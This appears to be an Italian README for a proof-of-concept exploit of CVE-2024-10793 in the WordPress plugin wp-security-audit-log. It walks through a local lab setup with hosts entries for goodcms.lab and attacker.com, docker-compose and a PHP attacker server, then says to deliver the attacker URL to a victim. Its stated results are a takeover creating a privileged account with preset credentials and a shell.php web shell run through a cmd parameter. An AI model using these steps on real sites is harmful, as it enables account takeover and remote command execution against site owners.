
Exploit proof-of-concept per CVE-2024-10793 che mira al plugin WordPress wp-security-audit-log. Dimostra account takeover, creazione di utenti privilegiati, upload di shell e manipolazione admin tramite richieste HTTP modificate.
Aggiungi queste righe al tuo file hosts:
127.0.0.1 goodcms.lab
127.0.0.1 attacker.com
Avvia Wordpress usando docker:
$ sudo systemctl start docker
$ sudo docker-compose up -d
Apri http://goodcms.lab:2121 e segui i passaggi di installazione di wordpress. Installa wp-security-audit-log.5.2.1 o versioni precedenti in wordpress.
Avvia il server dell'attaccante:
$ php -S 0:9091 -t ./exploit
Consegna http://attacker.com alla vittima e Bingo!
Impatti dell'exploit:

Account Takeover e creazione di un utente privilegiato Poc: Credenziali dell'attaccante dopo l'exploit: { email: [email protected], username: amin, password: 123456 } (Puoi modificarle nel codice xpl.js.)
Esegui il comando shell: http://goodcms.lab:2121/wp-content/plugins/sogrid/shell.php?cmd=id
